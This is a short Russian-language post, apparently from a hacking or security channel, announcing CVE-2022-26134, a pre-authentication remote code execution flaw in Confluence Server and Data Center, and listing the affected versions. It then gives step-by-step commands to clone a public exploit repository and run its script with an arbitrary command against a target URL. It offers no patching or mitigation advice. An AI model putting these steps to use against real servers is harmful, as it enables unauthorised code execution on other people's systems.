
「💥」CVE-2022-26134 - Confluence Pre-Auth RCE

В уязвимых версиях Confluence Server и Data Center существует уязвимость внедрения OGNL, которая позволяет неаутентифицированному злоумышленнику выполнить произвольный код на экземпляре Confluence Server или Data Center. Уязвимые версии: с 1.3.0 до 7.4.17, с 7.13.0 до 7.13.7, с 7.14.0 до 7.14.3, с 7.15.0 до 7.15.2, с 7.16.0 до 7.16.4, с 7.17.0 до 7.17.4, с 7.18.0 до 7.18.1.


pip install requests
git clone https://github.com/AmoloHT/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py -cmd 'id' -u http://TARGET.TLD